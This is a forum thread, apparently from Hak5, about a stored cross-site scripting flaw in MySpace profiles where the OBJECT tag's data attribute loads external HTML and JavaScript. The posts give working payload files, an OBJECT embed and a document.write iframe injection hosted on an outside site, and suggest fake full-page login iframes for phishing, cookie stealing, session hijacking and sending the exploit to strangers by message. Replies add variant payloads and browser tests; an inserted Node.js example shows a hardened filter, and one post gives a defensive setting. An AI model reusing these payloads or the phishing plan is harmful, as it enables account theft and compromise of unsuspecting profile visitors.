Myspace

digip

About a week or so ago I was playing with MySpace widgets. One of the things I noticed is you can bypass the confirmation page for adding widgets to your profile. Well, I thought, this is bad, because you can probably add these widgets to anyone's pages. That wasn't the case, as it turned out to be based on your current logged-in session. While working on this with another forum member, I noticed some code he had used to try and insert some JavaScript. It failed to insert the JavaScript, but led me to my next attempts to insert scripts and iframes into my profile. Needless to say, I was able to insert both JavaScript and iframes into my profile. - Credit to DingleBerries for the inspiration and help on this hack.

Disclaimer: This is just for educational purposes. How you use it is up to you, but understand that neither myself or Hak5 is responsible in how you use this information!

Ok. A few things are needed for this to work.

1. A MySpace account.

2. Your own website to store the scripts and files.

How this works is, you add some JavaScript to a .js file on your site. Then you create a page that calls the .js file. Once you have created both the .js file and the page, it's time to embed it into a person's profile. You can do this on your own page, or just by adding it to a comment box on a friend's page.

The flaw relied on how MySpace handles the OBJECT tag. MySpace treats the OBJECT tag as if it were an Adobe Flash file, so anything you add in an OBJECT tag gets recreated on the server side as a Flash object structure. The problem is that OBJECT can also refer to HTML data and other structures.

Here is an example of some code you can test on your own MySpace page.

Create a file called alert.js and add the following code:

alert ("Welcome to MySpace. If you can see this, it's because MySpace is vulnerable to XSS attacks.");

Now create a file called alert.html:

<script type="text/javascript" src="http://www.yoursite.com/alert.js"></script>

Now that you have created the script and the page that calls the script, you can embed it into the page.

In your profile, add the following code:

<object data="http://www.yoursite.com/alert.html" width="0" height="0"></object>

Save and view your profile and you should now get a JavaScript alert box with our message "Welcome to MySpace. If you can see this, it's because MySpace is vulnerable to XSS attacks."

If you go back and edit your profile, you will see that MySpace has changed your OBJECT tag to look like a Flash document. But it still loads anything you put into the DATA= field. This is what it looks like after MySpace changes the code you posted above:

<object type="application/x-shockwave-flash" allowScriptAccess="never" allowNetworking="internal" height="0" width="0" data="http://www.yoursite.com/alert.html">
  <param name="allowScriptAccess" value="never" />
  <param name="allowNetworking" value="internal" />
  <param name="movie" value="http://www.yoursite.com/alert.html" />
</object>

Now let's say you wanted to load an iframe from another site. Change your alert.js file to the following code and you can now insert an iframe from any site of your choosing:

document.write('<iframe src="http://www.yoursite.com/somepage.html" name="MySpaceFrame" width="100" height="100" frameborder="0" marginwidth="0" marginheight="0">Must Be Able TO View I-Frames!</iframe>');

With some handy CSS wrapped around the object or within your .js file, you can make it so the iframe is the entire width and height of the page. You could then go further and mimic the home page and make a fake login site to phish for MySpace logins and passwords. The possibilities are up to you, since you can pretty much insert any code into the page at this point. XHTML requests (although I haven't tested any Ajax yet) are probably possible; cookie stealing, session hijacking, and a number of other attacks are also most likely possible with this vulnerability. And since MySpace uses server-side scripting through ColdFusion, anyone savvy with IIS scripting and ColdFusion might even be able to take this a step further than just controlling someone's profile.

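The post above describes a server-side filter that treats every OBJECT tag as a Flash movie but copies the user's data= URL straight into the rewritten tag. The following is an added example, not code from the original thread or from MySpace: it models that naive rewrite in Node.js next to a hardened version that only keeps an OBJECT whose data= points at an http(s) .swf on an allow-listed host, and drops the tag otherwise. The allow-listed host name media.example.com, the sample inputs and all function names are assumptions made for this example.

```javascript
// Added example (not from the original thread). Models the OBJECT-tag rewrite
// described in the post: the naive filter wraps any <object> as a Flash movie
// but keeps the submitted data= URL, so a browser that honours data= over
// type= will load arbitrary HTML. The hardened filter validates data= first.

const OBJECT_RE = /<object\b([^>]*)>[\s\S]*?<\/object>/gi;
const ATTR_RE = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;

// Hypothetical allow-list of hosts permitted to serve Flash movies.
const FLASH_HOSTS = new Set(['media.example.com']);

// Parse the attribute string of one tag into a lower-cased name -> value map.
function parseAttrs(raw) {
  const attrs = {};
  let m;
  ATTR_RE.lastIndex = 0;
  while ((m = ATTR_RE.exec(raw)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Emit the Flash wrapper structure the post shows MySpace producing.
function flashWrapper(data, width, height) {
  const d = escapeAttr(data);
  return `<object type="application/x-shockwave-flash" allowScriptAccess="never" ` +
         `allowNetworking="internal" height="${height}" width="${width}" data="${d}">` +
         `<param name="allowScriptAccess" value="never" />` +
         `<param name="allowNetworking" value="internal" />` +
         `<param name="movie" value="${d}" />` +
         `</object>`;
}

// Naive filter: every <object> becomes a Flash object and data= is kept as-is
// (only attribute-quoted), whatever it points at.
function naiveRewrite(html) {
  return html.replace(OBJECT_RE, (_tag, rawAttrs) => {
    const a = parseAttrs(rawAttrs);
    return flashWrapper(a.data || '', a.width || '0', a.height || '0');
  });
}

// Return the normalised URL if it is an http(s) .swf on an allowed host, else null.
function allowedFlashUrl(value) {
  let url;
  try { url = new URL(value); } catch (e) { return null; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  if (!FLASH_HOSTS.has(url.hostname.toLowerCase())) return null;
  if (!url.pathname.toLowerCase().endsWith('.swf')) return null;
  return url.href;
}

// Only short positive integers are accepted as dimensions; anything else becomes "0".
function safeDim(v) {
  return /^\d{1,4}$/.test(v || '') ? v : '0';
}

// Hardened filter: validate data= before wrapping; otherwise drop the whole tag.
function hardenedRewrite(html) {
  return html.replace(OBJECT_RE, (_tag, rawAttrs) => {
    const a = parseAttrs(rawAttrs);
    const data = allowedFlashUrl(a.data || '');
    if (data === null) return '';
    return flashWrapper(data, safeDim(a.width), safeDim(a.height));
  });
}

// Constructed inputs: the payload from the post and a legitimate Flash embed.
const PAYLOAD = '<object data="http://www.yoursite.com/alert.html" width="0" height="0"></object>';
const LEGIT   = '<object data="https://media.example.com/player.swf" width="425" height="350"></object>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('naive:   ', naiveRewrite(PAYLOAD));
  console.log('hardened:', JSON.stringify(hardenedRewrite(PAYLOAD)));
  console.log('hardened:', hardenedRewrite(LEGIT));
}
```

The point of the hardened version is that the type= attribute and the allowScriptAccess/allowNetworking params do not constrain what data= loads, so the filter has to validate the URL itself (scheme, host and file extension) and refuse the tag when it cannot, rather than relying on the Flash wrapper to neutralise it.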

A multi-million dollar business, such as MySpace, should have much stricter standards. If companies like this are allowed to half-ass code then it really doesn't set a good example for others. I understand they are working with vast amounts of data and extremely complex code, but it is the principle of the matter. I still prefer plain text sites.


One of the things I haven't tried (mainly because I don't have accounts) is using this method on Facebook or LinkedIn. I imagine any site that allows (HTML + OBJECT) comments could be vulnerable to this sort of thing.

One way this can be blocked from people adding it to your comments is changing your preferences under your account settings.

http://profileedit.myspace.com/index.cfm?f...s.miscellaneous

By unchecking the boxes for allowing HTML in comment fields, people will not be able to post images, videos, or any HTML tags to your page. This is a good thing, as it makes your page safer! I know, you all love those little glitter graphics and "showing some love" on your comment pages, but what you are doing is opening up your page to intruders who might use this against you. Say for instance your friend's or family member's account was hacked and someone posted some comments as them. They could essentially take over your entire page, redirecting visitors or capturing your every click and trying to serve you with malware, spyware or the like. What that means is anyone viewing a friend's comment with the embedded code could be put at risk.

MySpace has a feature where you can send messages to any profile, sort of like email, and you don't have to be friends with anyone to send them a message. You just need to have a MySpace account to send them a message. Add this exploit to the message with an iframe mimicking the login page and you could potentially phish their account.


That's awesome! I didn't know you could do that!! ;) lol it's been like this for a while now, so they haven't exactly figured it out yet! I wonder how long it will take them to patch it...

Well looks like some javascript fun until they do! :) Nice job


Strangely I can't seem to get the desired effect on my myspace page...

I also tried:

alert.js:

function HackedUpSpace()
{
    alert("Welcome to my myspace page!");
}

alert.html

<html>
<head>
<script type="text/javascript" src="http://popeax.com/alert.js"></script>
</head>
<body onload="HackedUpSpace();">
</body>
</html>

still to no avail! Can someone else test it and confirm it's working? Maybe I'm just doing something wrong?



I also tried and no cigar....

Patched that quick??


Be sure that you are linking to an external site that contains the .js and that

allowScriptAccess="never" allowNetworking="internal"

is set to

allowScriptAccess="always" allowNetworking="external"

...I think that's what I had, I'm a little drunk atm so I'll have to get back to you on that.


Pretty amazing, This will be fixed soon though,

But you have a great chance to "have some fun". (In a legal way.. 8-) )


edit: anyway, just go here to see a demonstration: http://blog.myspace.com/index.cfm?fuseacti...logID=445918711

I posted it on my music page. This won't be up more than today, so take a look and let me know what you see. Make sure you are not running NoScript in FF or have JavaScript turned off. You should see the alert message I posted above in the first post.


I'm wondering if this is more a flaw in the combination of MySpace and Opera together, as I can not get it to work under Internet Explorer, but it works every time in Opera. Either way, MySpace should not be able to load the data from another site, even if it only seems to be working in Opera. I may have to modify it to work in other browsers for now.

Here is a screen grab of my JavaScript alert window:

[screenshot: myspace_xss.jpg]

If this is isolated to Opera, then it's kind of a double whammy, as it's a problem both for the Opera browser and MySpace.

I think I may be patched against this in Internet Explorer but I don't have an older version of Internet Explorer to test it on. I don't have Firefox installed either, so I can't vouch for whether or not it's going to work in FF, but from the sound of it so far, it only seems to be affecting the Opera browser X(

I can however get the flaw to work in IE when viewed from a page that does not rewrite the OBJECT code the way MySpace does. What I mean by that is, if you view the code in a page as

<object data="http://www.yoursite.com/alert.html" width="0" height="0"></object>

Then it works in both Opera and Internet Explorer.

and when written like

<object type="application/x-shockwave-flash" allowScriptAccess="never" allowNetworking="internal" height="0" width="0" data="http://www.yoursite.com/alert.html">
  <param name="allowScriptAccess" value="never" />
  <param name="allowNetworking" value="internal" />
  <param name="movie" value="http://www.yoursite.com/alert.html" />
</object>

It only seems to execute in Opera.


Well, I just tried it on several XP machines, all running SP3 and the latest patches (which all have Opera installed on them as well) and it works on all of them using Opera, but sadly does not work in Internet Explorer on any of them. Not sure why, but I guess the bug is a combination of MySpace and Opera flaws together.

Anyone else here with Opera care to view my blog post to see if you get the alert popup? I'd really like some feedback from Opera users on this, as well as any other browsers aside from FF and IE. So if you are using Safari, Konqueror, Gnome, etc., let me know if it's working or not working in them.


I will start my mad XSS skills up in a little bit and get one to work in FF. Have you tried allowing script access?

Yeah. MySpace breaks the code for everything except Opera. Opera is so good that it loads stuff it probably shouldn't. lol. I'm checking with http://browsershots.org/http://blog.myspac...logID=445918711 to see if I can catch any screen grabs of it in action on another browser. So far nothing. Looks like it's just localized to Opera and MySpace unless you can use the original OBJECT code somehow. As soon as MySpace adds the param name stuff it breaks it in IE and FF, so I don't understand why Opera is loading it.

Only Opera seems to show the flaw: http://browsershots.org/png/original/45/45...b694b46db27.png :(

Definitely not a Windows-only bug though, as it does load the XSS flaw in Ubuntu under Opera:

[screenshot: ubuntu_opera_Myspace_XSS_Flaw.jpg]


Meanwhile - (6 years later)

Why is a "myspace popup" video insert just starting to show up in the corner of certain web pages I visit with Chrome, or is it just me?

I searched the web and see others have seen this for several months now, and mine only just started, and then I remembered.

I just changed my virus scanner. Without going into deep details, I "removed" one and launched another and this shit showed up...

[screenshot: wtf-300x243.jpg]
